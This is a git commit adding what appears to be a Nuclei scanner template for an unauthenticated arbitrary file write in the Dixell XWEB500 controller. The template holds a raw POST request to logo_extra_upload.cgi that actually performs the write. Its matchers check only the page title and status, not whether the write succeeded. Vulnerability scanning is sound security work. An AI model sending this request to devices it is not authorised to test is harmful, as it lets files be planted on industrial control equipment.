Create dixell-xweb500-file-write.yaml

2022-03-11 01:57:31 +05:30 · 2022-03-11 01:57:31 +05:30 · a5713235f2
parent 99c244811c
commit a5713235f2
1 changed files with 34 additions and 0 deletions
--- a/vulnerabilities/other/dixell-xweb500-file-write.yaml
+++ b/vulnerabilities/other/dixell-xweb500-file-write.yaml
@ -0,0 +1,34 @@
+id: arbitrary-file-write
+
+info:
+  name: arbitrary-file-write
+  author: hackerarpan
+  severity: critical
+  reference: https://www.exploit-db.com/exploits/50639
+  tags: arbitrary-file-write,iot
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: */*
+        Content-Type: application/octet-stream
+        Content-Length: 24
+        Connection: close
+          
+        admin.file1
+        No contents
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Xweb500</title>"
+
+      - type: status
+        status:
+          - 200